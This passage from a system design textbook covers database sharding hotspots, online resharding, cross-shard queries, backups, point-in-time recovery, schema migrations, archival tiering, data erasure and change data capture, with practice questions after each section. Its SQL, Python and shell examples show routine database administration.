# FIX 3: SPLIT COUNTERS — the write-hotspot version of salting.
# Instead of one row everyone contends on:
# UPDATE posts SET likes = likes + 1 WHERE id = 42 <- serialized
# use per-bucket rows and sum on read:
# UPDATE like_shards SET n = n + 1 WHERE post_id = 42 AND bucket = ?
# SELECT sum(n) FROM like_shards WHERE post_id = 42 <- 32 cheap rows
# FIX 4: A BETTER SHARD KEY — usually the real fix, and the most expensive.
# Composite keys with high-cardinality leading components distribute naturally.
| Symptom | Diagnosis | Effective fix |
|---|---|---|
| One shard much larger | Data skew | Better shard key; split the range |
| One shard's CPU pinned, sizes equal | Read hotspot | Cache the hot keys; add replicas |
| One row contended by writers | Write hotspot | Salting or split counters |
| Newest shard takes all writes | Temporal hotspot | Prefix the key with high-cardinality data |
| Latency fine at p50, awful at p99 | Occasional hotspot | Find the hot key; it is usually one entity |
Two habits prevent most of this. Measure per-shard load, not cluster averages — an average hides exactly the imbalance you are looking for. And choose the shard key from the access pattern, testing it against realistic, skewed data rather than uniformly generated test data, which will make any key look perfect.
Key Takeaways
- Data skew (uneven storage) and traffic hotspots (uneven load) are different problems with different fixes.
- Real distributions follow power laws — assume skew rather than hoping for uniformity.
- Salting and split counters spread a hot key at the cost of gather-on-read.
- A read hotspot is usually a caching problem; a write hotspot usually needs a key change.
🧪 Practice
- A social platform shards by
user_id. One account has 200 million followers. Identify every hotspot this creates and propose fixes.- Implement a split counter for post likes, including the read path and its cost.
- Interview: Your shards hold equal data but one is at 95% CPU. Walk through your investigation. (Hint: equal storage rules out one whole category — what does that leave, and how do you find the specific key?)
Resharding and Rebalancing
The number of shards you chose at the start will eventually be wrong. Data grows, traffic grows, and hardware changes — so at some point you must add shards and redistribute existing data. Doing that while the system serves live traffic, without data loss or downtime, is one of the more demanding operations in infrastructure engineering.
The reason it is hard is that during the move, a given key exists in two places and writes keep arriving. Any scheme must answer: where do writes go during the copy, how do you catch up the delta, how do you cut over atomically, and how do you roll back if verification fails.
ONLINE RESHARD OF ONE LOGICAL SHARD
1. DUAL WRITE writes -> old shard AND new shard (new is not read yet)
2. BACKFILL copy historical rows old -> new, in batches, throttled
3. VERIFY compare row counts and checksums; sample-compare rows
4. SHADOW READ read from both, compare results, alert on mismatch
(this step is what catches subtle bugs before users do)
5. CUT OVER flip the routing entry; reads now come from new
6. SOAK keep dual-writing for a while — this is your rollback
7. CLEAN UP stop dual writes, delete the old copy
Every step is individually reversible until step 7. That is the design goal.
# Dual-write with a migration state machine. The state lives in the routing
# metadata, so every client behaves consistently.
class MigrationState(Enum):
STABLE = "stable" # only the old shard
DUAL_WRITE = "dual_write" # write both, read old
VERIFYING = "verifying" # write both, read old, compare new
CUT_OVER = "cut_over" # write both, read NEW
COMPLETE = "complete" # only the new shard
def write(key, value, router):
state, old, new = router.lookup(key)
if state in (MigrationState.STABLE,):
return old.put(key, value)
if state is MigrationState.COMPLETE:
return new.put(key, value)
# All intermediate states write BOTH. The new shard must never miss a write
# that lands after the backfill has already passed that row.
old.put(key, value)
new.put(key, value) # if this fails, the migration must halt, not
# silently continue with a divergent copy
def read(key, router):
state, old, new = router.lookup(key)
if state in (MigrationState.CUT_OVER, MigrationState.COMPLETE):
return new.get(key)
return old.get(key)
The far better strategy is to avoid resharding entirely by over-provisioning logical shards up front. Create 1,024 logical shards on day one and place them on 4 physical nodes; growing to 8 nodes moves whole logical shards without touching the hash function or any key's identity.
LOGICAL SHARDS DECOUPLE KEY MAPPING FROM PHYSICAL PLACEMENT
day 1: 1024 logical shards -> 4 nodes (256 each)
later: 1024 logical shards -> 8 nodes (128 each)
hash(key) -> logical shard NEVER CHANGES
only the logical -> physical placement map changes
Moving a logical shard is a bounded, resumable, verifiable unit of work.
| Approach | Downtime | Complexity | Risk |
|---|---|---|---|
| Stop the world and copy | Hours | Low | Unacceptable for most services |
| Dual write and backfill | None | High | Divergence if a dual write fails |
| Logical shard movement | None | Medium | Bounded per shard; resumable |
| Consistent hashing | None | Low | Only ~1/n moves, handled by the system |
Key Takeaways
- Resharding must handle live writes arriving during the copy — that is the hard part.
- The standard sequence is dual write, backfill, verify, shadow read, cut over, soak, clean up.
- Keep every step reversible until the old copy is deleted.
- Over-provision logical shards from day one so growth becomes placement changes, not rehashing.
🧪 Practice
- Write the full runbook to go from 4 to 8 shards online, including verification and rollback criteria.
- Explain what breaks if a dual write succeeds on the old shard and fails on the new one, and how to detect it.
- Interview: How do you verify a migration copied data correctly without comparing every row? (Hint: think about what you can compute cheaply per range and compare across two systems.)
Cross-Shard Queries and Joins
Sharding is what makes a database scale, and cross-shard queries are what it costs. Once rows for one logical question live on different machines, the database can no longer answer it with a local join — someone has to query every shard and combine the results, and that someone is usually your application.
Two operations become fundamentally harder: queries that span shards, and transactions that must update rows on more than one shard atomically.
SCATTER-GATHER
query "top 10 orders by total, all customers"
|
+--> shard 0: top 10 locally
+--> shard 1: top 10 locally
+--> shard 2: top 10 locally (each must return 10, not fewer)
+--> shard 3: top 10 locally
|
v
merge 40 rows -> re-sort -> take the global top 10
Costs:
- latency = the SLOWEST shard, not the average (tail amplification, 1.2)
- one logical query becomes N physical queries; capacity divided by N
- pagination is genuinely hard: page 2 needs each shard's rows 11-20, and
OFFSET across shards does not compose. Cursor pagination (3.1) per shard
plus a merge is the workable approach.
async def scatter_gather_top_n(shards, sql, n, key):
# Each shard must return n rows — the global top n could all live on one.
results = await asyncio.gather(*[
s.query(sql, limit=n) for s in shards
], return_exceptions=True)
rows, failed = [], 0
for r in results:
if isinstance(r, Exception):
failed += 1 # decide deliberately: fail the query,
continue # or return a PARTIAL result and say so
rows.extend(r)
if failed:
raise PartialResult(f"{failed}/{len(shards)} shards unavailable")
return sorted(rows, key=key, reverse=True)[:n]
The design work is mostly about avoiding these queries rather than optimizing them:
| Technique | How it avoids cross-shard work |
|---|---|
| Co-location by shard key | Put related entities on the same shard (all of a tenant's data keyed by tenant_id) |
| Denormalization | Copy the joined fields into the row (4.2) |
| Reference-table replication | Copy small, rarely changing tables to every shard |
| A derived aggregate store | Send changes to a search or analytics store that holds everything (4.3) |
| Cursor pagination per shard | Merge sorted streams instead of using global OFFSET |
Cross-shard transactions are worse still, because atomicity across machines requires either two-phase commit — which blocks if the coordinator fails — or a saga with compensating actions, which gives up isolation entirely. Both are covered in Chapter 8.5. The practical guidance is to design the shard key so that every transaction is single-shard, treating a cross-shard transaction as a design failure rather than a feature to implement.
CHOOSING A SHARD KEY THAT AVOIDS THE PROBLEM
Multi-tenant SaaS -> shard by tenant_id
every tenant's users, orders, and settings land together, so joins and
transactions stay local and cross-shard queries are admin-only reporting.
Social network -> shard by user_id
a user's own data is local; the follower graph is inherently cross-shard
and is handled by a separate, purpose-built store.
Key Takeaways
- Cross-shard queries become scatter-gather: N physical queries, latency set by the slowest shard.
- Global
ORDER BY,LIMIT, aggregation, and pagination must be recomputed by the client after merging.- Avoid the problem by co-locating related data under one shard key and replicating small reference tables.
- Treat cross-shard transactions as a design failure; choose a key that keeps every transaction single-shard.
🧪 Practice
- Implement scatter-gather pagination for page 3 of a globally sorted list and explain why
OFFSET 20per shard is wrong.- Choose a shard key for a multi-tenant CRM and list which queries remain cross-shard.
- Interview: A cross-shard transaction is required by a new feature. What are your options? (Hint: one changes the data layout, one changes the consistency guarantee, and one changes the feature.)
<a id="46-data-lifecycle-management"></a>
4.6 Data Lifecycle Management
Data has a life beyond being written and read: it must be recoverable, migratable, eventually cheaper to store, sometimes legally erasable, and often streamed elsewhere.
Backup and Restore Strategies
Replication protects against hardware failure. It does not protect against a
DELETE with a missing WHERE clause, a bad migration, ransomware, or a bug that
corrupts data over three weeks — because replicas faithfully reproduce all of
those within milliseconds. Backups protect against logical damage, which is
the category that actually destroys companies.
The distinction is worth stating plainly: replication gives you availability; backups give you the ability to go back in time. They are not substitutes.
WHAT PROTECTS AGAINST WHAT
threat replication backup
-----------------------------------------------------
disk failure yes yes
node/AZ failure yes yes
region failure multi-region yes
accidental DELETE/DROP NO yes
bad migration NO yes
slow data corruption bug NO yes* (*if retention is long
ransomware NO yes* enough to predate it)
deleting the backups themselves NO immutable/offline copies only
The industry shorthand is the 3-2-1 rule: at least 3 copies of the data, on 2 different media or storage systems, with 1 copy off-site. In cloud terms that usually means the live database, automated snapshots in the same region, and replicated backups in a different region and a different account.
# PHYSICAL backup: a byte-level copy of the data directory plus WAL. Fast to
# take and fast to restore; tied to the exact database version and platform.
pg_basebackup -h db.internal -D /backups/base -Fp -Xs -P
# LOGICAL backup: a portable dump of schema and data. Slower both ways, but
# version-portable, selectively restorable, and human-inspectable.
pg_dump --format=custom --compress=9 orders > orders_2026-03-11.dump
pg_restore --dbname=orders --jobs=8 orders_2026-03-11.dump # selective restore
# The part teams skip: proving the backup works. An untested backup is a
# hypothesis, not a recovery plan.
def weekly_restore_drill(backup, staging):
started = time.time()
staging.restore(backup.latest()) # full restore
elapsed = time.time() - started
checks = {
"row_counts_match": staging.count("orders") >= backup.metadata.row_count,
"constraints_valid": staging.validate_constraints(),
"spot_check_rows": staging.sample_matches(backup.metadata.checksums),
"meets_rto": elapsed < RTO_SECONDS, # RTO is a MEASURED number
}
if not all(checks.values()):
page_oncall("restore drill failed", checks)
metrics.gauge("backup.restore_seconds", elapsed) # track it over time:
return checks # restores get slower as
# data grows
| Dimension | Choice | Consequence |
|---|---|---|
| Type | Physical vs. logical | Speed and size vs. portability and selectivity |
| Scope | Full vs. incremental | Restore simplicity vs. backup window |
| Frequency | Sets your RPO | More frequent = less data lost |
| Retention | Days vs. years | Protects against slow corruption; costs money |
| Location | Same region vs. cross-region vs. cross-account | Blast-radius isolation |
| Immutability | Object lock / WORM | Survives an attacker with your credentials |
That immutability row has become essential. If your backups can be deleted with the same credentials that run your infrastructure, a compromised account destroys both the data and its recovery path at once. Object-lock retention and a separate account with separate credentials are what make backups survive an attacker.
Key Takeaways
- Replication protects against hardware failure; only backups protect against logical damage.
- Follow 3-2-1: three copies, two storage systems, one off-site.
- Physical backups restore fast; logical backups are portable and selectively restorable.
- Test restores on a schedule and measure the time — an untested backup is not a backup. Make backups immutable and separately credentialed.
🧪 Practice
- Design a backup strategy for a 2 TB database with RPO 15 minutes and RTO 1 hour, and state what each component contributes.
- Explain why a read replica is not a backup, using two concrete failure scenarios.
- Interview: A corruption bug has been silently damaging rows for three weeks. What does your backup strategy need for you to recover? (Hint: think about retention depth and about how you would even identify the last good moment.)
Point-in-Time Recovery
A nightly backup restores you to midnight. If the damaging UPDATE ran at 14:32,
restoring the backup discards fourteen hours of legitimate work along with the
mistake. Point-in-time recovery (PITR) removes that trade-off: restore the
last full backup, then replay the write-ahead log up to any chosen instant — say
14:31:59.
This is possible precisely because of the WAL from section 4.1. The log already contains every change in order, so a base backup plus a continuous archive of log segments is a complete, replayable history.
PITR = BASE BACKUP + CONTINUOUS WAL ARCHIVE
00:00 [ full base backup ]
|
------+====WAL====WAL====WAL====WAL====WAL====WAL====> time
^
14:31:59 target
(just before the bad UPDATE at 14:32)
Restore = copy the base backup, then replay archived WAL segments and stop
at the target. Everything committed before 14:31:59 is present; nothing
after it is applied.
Your RPO is set by how often WAL segments are ARCHIVED, not by how often the
base backup runs.
# 1. Enable continuous archiving (this is what makes PITR possible at all)
# postgresql.conf:
# wal_level = replica
# archive_mode = on
# archive_command = 'aws s3 cp %p s3://db-wal-archive/%f'
# archive_timeout = 60 # force a segment at least every 60s -> RPO ~60s
# 2. Recover to an instant:
# restore the base backup, then in recovery.signal / postgresql.conf:
# restore_command = 'aws s3 cp s3://db-wal-archive/%f %p'
# recovery_target_time = '2026-03-11 14:31:59+00'
# recovery_target_action = 'pause' # PAUSE, do not auto-promote: verify
# # the data before making it live
# The hardest part of PITR is not the mechanics — it is choosing the target.
def find_recovery_target(audit_log, table):
"""Locate the last known-good instant before damage began."""
# Sources that tell you WHEN, in rough order of reliability:
# 1. the application audit log / CDC stream (what changed, and when)
# 2. the deploy timeline (a bad release is often the cause)
# 3. row-level updated_at timestamps on the damaged rows
# 4. user reports (least precise, usually latest)
suspicious = audit_log.first_anomaly(table)
return suspicious.timestamp - timedelta(seconds=1)
# And the decision that surrounds it: a full PITR rolls back EVERYTHING,
# including good writes made after the damage began. Often the better plan is:
# - PITR into a SEPARATE instance at the target time
# - extract only the damaged rows from it
# - merge them back into the live database
# This is slower but does not discard fourteen hours of unrelated work.
| Aspect | Restore from backup | Point-in-time recovery |
|---|---|---|
| Granularity | Backup boundaries | Any instant covered by the archive |
| RPO | Backup interval (hours) | WAL archive interval (seconds/minutes) |
| Storage cost | Backups only | Backups plus the full WAL archive |
| Restore time | Base copy | Base copy plus replay (longer for a distant target) |
| Data after the target | Lost | Lost — unless you restore side-by-side and merge |
Key Takeaways
- PITR restores a base backup and replays the WAL to any chosen instant.
- RPO is determined by WAL archive frequency, not by backup frequency.
- Pause before promoting a recovered instance and verify the data first.
- Prefer restoring to a side instance and merging the damaged rows over rolling the whole database back.
🧪 Practice
- Calculate the WAL storage needed for 7 days of PITR at 50 GB of WAL per day, and state your RPO under a 5-minute archive timeout.
- Describe how you would identify the exact recovery target after a bad migration.
- Interview: PITR would lose 6 hours of good writes made after the corruption started. What do you do? (Hint: nothing says the recovered copy has to become the live database.)
Schema Migrations at Scale
On a small table, ALTER TABLE is instant. On a 500-million-row table under
production load, the same statement can hold an exclusive lock for an hour,
queueing every query behind it and taking the application down. Schema migration
at scale is the discipline of changing structure without ever holding a long lock
and without a moment where the running code and the schema disagree.
Two constraints drive everything. Deploys are not atomic: during a rolling
release, old and new application versions run simultaneously against one schema.
And locks are contagious: a blocked ALTER blocks every subsequent query on
the table, including reads, so a "brief" lock becomes a full outage.
THE EXPAND-CONTRACT PATTERN (the safe way to change anything)
EXPAND add the new structure; leave the old one working
-> schema now supports BOTH old and new code
MIGRATE backfill data into the new structure, in throttled batches
SWITCH deploy code that reads and writes the new structure
CONTRACT once no code uses the old structure, remove it
Renaming `name` -> `full_name`, safely, across four deploys:
deploy 1 ADD COLUMN full_name (nullable, no default rewrite)
app writes BOTH columns, reads `name`
deploy 2 backfill full_name in batches; app reads full_name, writes both
deploy 3 app reads and writes full_name only
deploy 4 DROP COLUMN name
A single `ALTER TABLE ... RENAME` would break every running instance of the
old code the instant it landed.
-- SAFE: metadata-only in modern PostgreSQL and MySQL 8
ALTER TABLE orders ADD COLUMN currency TEXT; -- nullable, no default
ALTER TABLE orders ADD COLUMN currency TEXT DEFAULT 'EUR'; -- PG 11+: no rewrite
-- DANGEROUS: rewrites the whole table while holding an exclusive lock
ALTER TABLE orders ALTER COLUMN total TYPE NUMERIC(14,2);
ALTER TABLE orders ADD COLUMN x TEXT NOT NULL DEFAULT ''; -- older versions rewrite
-- SAFE index creation: does not block writes (takes longer, can fail and
-- leave an INVALID index that must be dropped and retried)
CREATE INDEX CONCURRENTLY idx_orders_currency ON orders (currency);
-- SAFE constraint addition: two steps, neither taking a long lock
ALTER TABLE orders ADD CONSTRAINT chk_total CHECK (total >= 0) NOT VALID;
ALTER TABLE orders VALIDATE CONSTRAINT chk_total; -- scans without blocking writes
-- ALWAYS bound the wait, so a migration fails fast instead of queueing traffic
SET lock_timeout = '3s';
SET statement_timeout = '30s';
# Backfills must be batched, throttled, resumable, and idempotent.
def backfill_currency(db, batch=5_000):
last_id = load_checkpoint() or 0 # resumable after a restart
while True:
rows = db.execute(
"UPDATE orders SET currency = 'EUR' "
"WHERE id > %s AND currency IS NULL "
"ORDER BY id LIMIT %s RETURNING id", (last_id, batch))
if not rows:
break
last_id = rows[-1].id
save_checkpoint(last_id)
# Throttle on replication lag, not on a fixed sleep: the backfill must
# not push followers behind and break read-your-writes (4.4).
while db.replication_lag_seconds() > 5:
time.sleep(1)
| Operation | Lock impact | Safe approach |
|---|---|---|
| Add nullable column | Metadata only | Direct |
| Add column with default | Version-dependent | Check your version; else add then backfill |
| Drop column | Metadata only | Direct — but only after no code reads it |
| Rename column | Metadata only, breaks code | Expand-contract across deploys |
| Change column type | Full table rewrite | New column, backfill, switch, drop |
| Add index | Blocks writes | CREATE INDEX CONCURRENTLY |
Add NOT NULL | Full scan | CHECK ... NOT VALID, then validate |
| Add foreign key | Locks both tables | NOT VALID, then validate |
For very large tables on MySQL, tools like gh-ost and pt-online-schema-change
implement a shadow-table approach: build a copy with the new schema, replay
changes from the binlog, then swap atomically. The principle is the same as the
online resharding in 4.5 — build alongside, verify, cut over, keep a rollback.
Key Takeaways
- Rolling deploys mean old and new code share one schema — every migration must be compatible with both.
- Use expand-contract: add, backfill, switch, then remove, across separate deploys.
- Know which operations rewrite the table; set
lock_timeoutso migrations fail fast instead of queueing traffic.- Backfills must be batched, checkpointed, and throttled on replication lag.
🧪 Practice
- Write the four-deploy plan to split
full_nameintofirst_nameandlast_nameon a 200-million-row table.- Explain why
SET lock_timeoutprotects availability more than a carefully-chosen maintenance window does.- Interview: A migration must add a
NOT NULLcolumn with a computed default to a huge live table. Walk through it. (Hint: separate "the column exists" from "every row has a value" from "the constraint is enforced".)
Data Archival and Tiering
Data does not stay equally valuable. Yesterday's orders are queried constantly; orders from 2019 are queried by an auditor twice a year — yet in a naive design both sit on the same expensive storage, in the same tables, slowing the same queries and inflating the same backups. Tiering matches storage cost to access frequency; archival moves cold data out of the operational path entirely.
The benefit is not only money. A smaller hot table means more of it fits in the
buffer pool, indexes are smaller and shallower, VACUUM and backups finish
faster, and restores meet their RTO. Archival is a performance strategy that
happens to save cost.
A TEMPERATURE HIERARCHY
HOT last 90 days primary DB, SSD, fully indexed
query latency: milliseconds cost: 1x
WARM 90 days - 2 years partitioned tables or a columnar store
query latency: seconds cost: ~0.2x
COLD 2 - 7 years object storage (Parquet), queried on demand
query latency: seconds-minutes cost: ~0.02x
FROZEN 7+ years archival object tier (Glacier-class)
retrieval: minutes-hours cost: ~0.004x
The decision is driven by ACCESS FREQUENCY and by the LATENCY the rare
reader will accept — not by the age of the data as such.
-- Partitioning makes archival a metadata operation instead of a mass DELETE.
CREATE TABLE orders (...) PARTITION BY RANGE (created_at);
-- Detach an old partition: instant, no row-by-row work, no bloat.
ALTER TABLE orders DETACH PARTITION orders_2019_q1;
-- Export it to columnar files in object storage, then drop it.
COPY (SELECT * FROM orders_2019_q1) TO PROGRAM
'aws s3 cp - s3://archive/orders/2019/q1.parquet' (FORMAT parquet);
DROP TABLE orders_2019_q1;
# Archived data must remain QUERYABLE, or you have not archived it — you have
# hidden it. Provide an explicit path, and make its cost visible to callers.
def query_orders(start, end, db, lake):
if start >= HOT_BOUNDARY:
return db.query_orders(start, end) # milliseconds
if end < HOT_BOUNDARY:
return lake.query_parquet("orders", start, end) # seconds; scanned
# from object storage
# Spanning the boundary: query both and merge. Expose the latency
# difference rather than hiding it behind a uniform API that is sometimes
# 3 ms and sometimes 40 seconds.
return merge(db.query_orders(HOT_BOUNDARY, end),
lake.query_parquet("orders", start, HOT_BOUNDARY))
| Tier | Storage | Query path | Typical relative cost |
|---|---|---|---|
| Hot | Primary DB, SSD | Normal queries | 1x |
| Warm | Compressed partitions, columnar store | Slower SQL | ~0.2x |
| Cold | Parquet in object storage | Query engine on demand | ~0.02x |
| Frozen | Archival object tier | Restore first, then query | ~0.004x |
Two operational cautions. Retrieval costs money and time — archival tiers charge for restores and can take hours, so "we can always get it back" needs a tested procedure and a known cost. And archived data still has obligations: encryption, access control, and deletion requests apply to it exactly as they do to hot data, which is the subject of the next topic.
Key Takeaways
- Tiering matches storage cost to access frequency; archival removes cold data from the operational path.
- Smaller hot tables mean better cache hit rates, faster maintenance, and faster restores.
- Partitioning turns archival into detach-and-export instead of a mass
DELETE.- Archived data must stay queryable and still carries encryption, access, and deletion obligations.
🧪 Practice
- Design a tiering policy for an orders table growing 500 GB per year with a 7-year legal retention requirement.
- Explain why detaching a partition is dramatically cheaper than
DELETE FROM orders WHERE created_at < ....- Interview: Finance wants seven years of data queryable but the database is too expensive. What do you propose? (Hint: separate "queryable" from "queryable in 5 milliseconds" and price each.)
Data Retention and Deletion
Keeping data forever used to be the default because storage is cheap. It is now a liability: privacy regulation grants individuals a right to erasure, security teams treat old personal data as breach surface, and legal teams know that anything retained is discoverable. Retention has become a design requirement, and "delete this user's data" turns out to be surprisingly hard in a distributed system.
The reason is that data spreads. One user's record lives in the primary database,
its replicas, backups, the search index, the cache, the analytics warehouse, log
files, the message queue's retained topics, and a third-party CRM. A DELETE
against the primary addresses one of those.
WHERE ONE USER'S DATA ACTUALLY LIVES
[primary DB] ---> [replicas] deleted by replication
|
+---> [backups] NOT deleted — they are immutable by design
+---> [search index] needs its own deletion path
+---> [cache] needs explicit invalidation
+---> [analytics warehouse] needs its own deletion path
+---> [event stream] retained for days; may need compaction
+---> [application logs] often contain PII; retention-bound
+---> [third-party services] needs an API call, and proof it happened
A deletion request is a WORKFLOW across every one of these, not a SQL statement.
# Crypto-shredding: the technique that resolves the backup problem.
# Encrypt each user's personal data with a per-user key. Deleting the KEY makes
# every copy of the ciphertext — including immutable backups — unreadable.
def store_pii(user_id, data, kms, db):
key = kms.get_or_create_key(f"user:{user_id}") # one key per subject
db.insert("user_pii", {"user_id": user_id, "blob": encrypt(data, key)})
def erase_user(user_id, kms, db, search, warehouse, crm):
kms.destroy_key(f"user:{user_id}") # backups now hold undecryptable bytes
db.execute("DELETE FROM user_pii WHERE user_id = %s", (user_id,))
search.delete_document(f"user:{user_id}")
warehouse.delete_subject(user_id) # or anonymize, if aggregates must stay
crm.delete_contact(user_id) # third parties need an explicit call
audit.record("erasure_completed", user_id) # you must be able to PROVE it
-- Soft delete keeps a row for recovery and referential integrity, but it is
-- NOT erasure — the personal data is still there.
UPDATE users SET deleted_at = now() WHERE id = 7;
-- Two-stage deletion is the pattern that satisfies both needs:
-- stage 1 (immediate): soft delete; the user disappears from the product
-- stage 2 (after the grace period): hard delete or anonymize
UPDATE users
SET email = concat('deleted-', id, '@invalid'), -- keep the row, destroy the
name = 'Deleted User', -- identifying content
phone = NULL,
anonymized_at = now()
WHERE deleted_at < now() - INTERVAL '30 days';
-- Aggregates and foreign keys survive; the person is no longer identifiable.
| Concern | Approach |
|---|---|
| Accidental deletion recovery | Soft delete with a grace period |
| Regulatory erasure | Hard delete or anonymization, plus crypto-shredding for backups |
| Referential integrity | Anonymize in place rather than removing the row |
| Backups | Crypto-shredding, or documented retention expiry |
| Analytics value | Aggregate first, then delete the identifiable rows |
| Legal hold | Suspends deletion — it must override retention automation |
| Proof | An audit trail of what was erased and when |
That legal-hold row is a real conflict: retention policies delete on a schedule, while litigation holds require preservation. Whichever system implements retention must support an override, or an automated job will destroy evidence someone was legally required to keep.
Key Takeaways
- Retention is a design requirement: old personal data is liability, not an asset.
- One user's data spans replicas, backups, indexes, caches, warehouses, logs, and third parties — erasure is a workflow.
- Crypto-shredding (destroy the per-user key) is how immutable backups are handled.
- Soft delete is recovery, not erasure; anonymization preserves aggregates and referential integrity. Keep an audit trail and honour legal holds.
🧪 Practice
- Enumerate every system that would hold a user's data in an app you know, and write the deletion step for each.
- Explain why soft delete alone does not satisfy a right-to-erasure request.
- Interview: How do you delete a user's data from immutable backups? (Hint: you do not have to make the bytes disappear to make them useless.)
Change Data Capture
Section 4.3 ended with a rule: never dual-write. But derived systems — search indexes, caches, analytics warehouses, other services — still need to know when data changes. Change data capture (CDC) solves this by reading the database's own write-ahead log and turning committed changes into an event stream. The database remains the single source of truth, and every derived system follows from its log.
The elegance is that CDC captures exactly what was committed, in commit order, including changes made by scripts, admin tools, and other services that never touched your application code. Nothing can be missed by forgetting to publish an event, because the publisher is the log itself.
CDC ARCHITECTURE
application --writes--> [ PostgreSQL ]
|
WAL (already exists, section 4.1)
|
[ CDC connector ] (Debezium, native logical decoding)
|
[ Kafka topics ] one per table, keyed by primary key
+------------+------------+-------------+
v v v v
[search index] [cache] [warehouse] [other service]
Each consumer is independent, replayable, and idempotent. If one breaks,
it catches up from its offset; if it needs rebuilding, it replays from the
beginning of the topic.
{
"op": "u",
"ts_ms": 1773225862000,
"source": { "table": "orders", "lsn": 24857392, "txId": 88123 },
"before": { "id": 42, "status": "pending", "total": "58.00" },
"after": { "id": 42, "status": "paid", "total": "58.00" }
}
Having both before and after is what makes CDC more useful than a plain event
feed: a consumer can react to the transition ("pending became paid") rather than
just the current state, which is exactly what audit trails and workflow triggers
need.
# Consuming CDC safely. Two properties are mandatory.
def handle_change(event, search, offsets):
key = f"{event['source']['table']}:{event['after']['id']}"
# 1. IDEMPOTENCY: delivery is at-least-once, so the same event will arrive
# twice. Use the LSN as a version so replays cannot go backwards.
if search.version_of(key) >= event["source"]["lsn"]:
return "already_applied"
if event["op"] in ("c", "u"): # create / update
search.index(key, event["after"], version=event["source"]["lsn"])
elif event["op"] == "d": # delete
search.delete(key, version=event["source"]["lsn"])
# 2. OFFSET COMMIT AFTER the side effect, never before — committing first
# means a crash silently skips the change.
offsets.commit(event.offset)
| CDC approach | How it works | Trade-off |
|---|---|---|
| Log-based | Reads the WAL/binlog | Complete, low overhead, ordered — the standard |
| Trigger-based | Database triggers write to an audit table | Portable; adds write latency and load |
| Query-based polling | Poll WHERE updated_at > last_seen | Simple; misses deletes and intermediate states |
| Application outbox | Write events in the same transaction | Explicit and portable; requires app discipline (Chapter 8.5) |
Operationally, three things matter. Replication slots retain WAL: a stopped CDC consumer causes the database's disk to fill, which is a genuine outage risk — monitor slot lag as a first-class alert. Schema changes flow through, so consumers must tolerate new and removed columns exactly as in Chapter 3.3. And snapshot plus stream is the standard bootstrap: an initial consistent snapshot, then the log from that snapshot's position onward.
Key Takeaways
- CDC turns the database's own commit log into an ordered event stream, so derived systems follow the source of truth.
- It captures every committed change regardless of which client made it — nothing can forget to publish.
before/afterimages let consumers react to transitions, not just current state.- Consumers must be idempotent and commit offsets after side effects; monitor replication slot lag or the database's disk will fill.
🧪 Practice
- Design a CDC pipeline that keeps an Elasticsearch index in sync, including the initial snapshot and a full rebuild path.
- Explain what happens to the primary database when a CDC consumer is down for a week, and how you would alert on it.
- Interview: How does CDC differ from the outbox pattern, and when would you choose each? (Hint: one captures rows, the other captures intent — think about which is easier for a consumer to interpret.)
Chapter Summary
| Concept | The one-line version |
|---|---|
| Storage abstractions | Block for databases, file for sharing, object for blobs at unlimited scale |
| Storage engines | The engine, not the query language, sets performance characteristics |
| B-tree vs. LSM | In-place updates and predictable reads, versus append-only fast writes |
| Write-ahead logging | Log before applying; one sequential fsync per commit powers recovery, replication, PITR, and CDC |
| Indexes | Turn scans into lookups; composite order matters, and functions disable them |
| Serialization | Text for humans, binary schema-driven for volume, columnar for analytics |
| Normalization | Every fact in one place; constraints are the only concurrency-safe checks |
| Denormalization | A cache inside the database — needs sync and reconciliation |
| ACID | Atomicity/durability from the WAL, isolation from MVCC, consistency from constraints |
| Isolation levels | Defined by permitted anomalies; write skew survives snapshot isolation |
| Locking vs. MVCC | Wait to prevent conflicts, or allow concurrency and detect them |
| Query planning | Read EXPLAIN ANALYZE; estimate-versus-actual gaps reveal stale statistics |
| Connection pooling | Size from Little's Law; the database's total limit is the real ceiling |
| Key-value | O(1) lookups, trivial partitioning, every access path is a key you maintain |
| Document | One entity, one read; embed bounded owned data, reference everything else |
| Wide-column | Partition key picks the node; model one table per query |
| Graph | Index-free adjacency makes multi-hop traversal cheap |
| Time-series | Time partitioning, delta compression, downsampling; guard tag cardinality |
| Search | Inverted index plus analysis pipeline; a derived, rebuildable index |
| Vector | ANN over embeddings; same model at index and query time; hybrid beats pure |
| Polyglot persistence | One owner per fact, everything else derived from a change stream |
| Leader-follower | One writer removes conflicts; scales reads, never writes |
| Multi-leader | Local writes at the price of conflict resolution; partition ownership instead |
| Quorums | W + R > N guarantees overlap; sloppy quorums quietly remove it |
| Sync vs. async replication | RPO 0 and a round trip, versus speed and possible loss on failover |
| Replication lag | Causes read-your-writes and monotonic read violations; route on lag |
| Failover | Detect, elect, redirect; fence the old leader or risk split-brain |
| Vertical vs. horizontal | Columns/tables versus rows; only sharding scales without limit |
| Range sharding | Keeps order and range queries; hotspots on sequential keys |
| Hash sharding | Even distribution, no ordering; plain modulo makes resharding catastrophic |
| Directory sharding | Explicit mapping enables per-tenant placement and residency |
| Consistent hashing | Adding a node moves ~1/n of keys; virtual nodes even out the ring |
| Hotspots | Data skew and traffic hotspots differ; cache reads, salt writes |
| Resharding | Dual write, backfill, verify, cut over, soak — reversible until cleanup |
| Cross-shard queries | Scatter-gather at the slowest shard's latency; co-locate to avoid them |
| Backups | Only backups survive logical damage; test restores and make them immutable |
| PITR | Base backup plus WAL replay to any instant; RPO set by archive frequency |
| Migrations | Expand-contract across deploys; batch and throttle backfills |
| Tiering | Match storage cost to access frequency; keep archives queryable |
| Retention | Erasure is a workflow across every copy; crypto-shredding handles backups |
| Change data capture | The commit log becomes an event stream; consumers idempotent, slots monitored |
<a id="5-caching-and-content-delivery"></a>
5. Caching and Content Delivery
Caching is the highest-leverage performance technique in system design: it turns expensive work into a memory lookup and removes most traffic from your origin before it ever arrives. This chapter covers why caching works at all, the strategies for reading and writing through a cache, the distributed systems problems that appear once the cache spans machines, and the content delivery networks that push all of it to the edge of the network.
<a id="51-caching-fundamentals"></a>
5.1 Caching Fundamentals
Before choosing a caching strategy, it is worth understanding why caches work, how to measure whether yours is working, and where in the stack a cache can sit.
Why Caching Works: Locality
A cache is a bet: that work you did recently will be asked for again, and that storing the answer is cheaper than recomputing it. If requests were uniformly random across a billion items, that bet would lose — a small cache would almost never hold what you need. Caching works because real access patterns are overwhelmingly non-uniform, and that property has a name: locality.
Two kinds matter. Temporal locality means an item accessed now is likely to be accessed again soon: a trending article, a logged-in user's profile, a configuration value read on every request. Spatial locality means items near one another get accessed together: the next row in a table scan, the next byte in a file, the other fields of the same record.
